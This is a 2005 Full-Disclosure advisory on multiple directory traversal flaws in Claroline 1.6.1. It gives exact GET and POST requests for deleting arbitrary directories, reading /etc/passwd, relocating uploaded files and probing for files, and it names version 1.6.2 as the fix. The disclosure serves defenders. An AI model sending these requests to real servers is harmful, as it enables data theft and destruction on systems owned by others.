Product description: Claroline (http://www.claroline.net) is a free
application based on PHP /MySQL. It's a collaborative learning environment
allowing teachers or education institutions to create and administer courses
through the web.
Vulnerability: Claroline 1.6.1 is vulnerable to multiple directory traversal
attacks. You have to have teacher privileges to perform any of these.
1) Arbitrary directory deletion
GET /claroline/scorm/scormdocument.php?delete=/../../001
Any directory owned by user www can be deleted, it does not have to be
empty.
2) Arbitrary file reading
POST /claroline/document/document.php
content:
move_file=%2F../../../../../../../../etc/passwd&move_to=%2F&move_file_submit=OK
Then: GET /courses/2510/document/passwd (where 2510 is the course id)
3) Arbitrary file creation
With /claroline/document/document.php, one can upload any file with any
content (no php files)
Using the same vulnerability as (2), one could move this file to anywhere on
the system.
POST /claroline/document/document.php
content: move_file=%2Ffile.cgi&move_to=%2F../..&move_file_submit=OK
4) Checking if certain files exist on the system (much less critical)
GET
/claroline/scorm/showinframes.php?openfirst=yes&indexRoute=&file=/tmp/test.txt
GET /claroline/scorm/contents.php?file=/tmp%2Ftest.txt
Solution: upgrade to version 1.6.2, the latest release, available at
http://www.claroline.net/download.htm
Robbe De Keyzer (robbedekeyzer_at_hotmail.com)
August 12, 2005
_________________________________________________________________
Gratis bloggen op MSN Spaces http://spaces.msn.com/?mkt=nl-be
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Aug 12 2005
Intro
